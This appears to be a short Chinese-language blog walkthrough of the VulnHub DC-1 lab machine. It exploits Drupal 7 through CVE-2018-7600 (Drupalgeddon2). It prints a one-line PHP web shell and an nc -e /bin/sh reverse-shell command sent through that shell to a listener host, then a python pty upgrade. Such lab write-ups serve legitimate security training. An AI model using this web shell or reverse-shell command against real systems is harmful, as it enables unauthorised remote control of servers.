VulnHub-DC1

發表於2022-03-20|更新於2024-01-30|滲透測試

|閱讀量:

尋找DC-1靶機

1	$ nmap 10.0.2.4 -A -p-

發現有port 80 -> 直接瀏覽網頁

使用wappalyzer得知使用Drupal 7

搜尋已知Exploit來取得RCE

CVE-2018-7600

Exploit:https://github.com/dreadlocked/Drupalgeddon2

ls -> 發現flag1

發現有shell.php

1	<?php if( isset( $_REQUEST['c'])) { system( $_REQUEST['c'] . ' 2>&1 ');}>

使用nc 監聽取回reverse shell(python pty)

1
2
3

http://10.0.2.4/shell.php?c=nc%20-e%20%2Fbin%2Fsh%2010.0.2.15%208080
nc -e /bin/sh 10.0.2.15 8080
python -c "import pty;pty.spawn('/bin/bash')"

文章作者: LuYee6813

文章連結: https://luyee6813.github.io/2022/03/20/%E6%BB%B2%E9%80%8F%E6%B8%AC%E8%A9%A6/2022-03-20-VulnHub-DC1/

版權聲明: 本部落格所有文章除特別聲明外，均採用 CC BY-NC-SA 4.0 許可協議。轉載請註明來自 LuYee6813's Blog！

資料庫載入中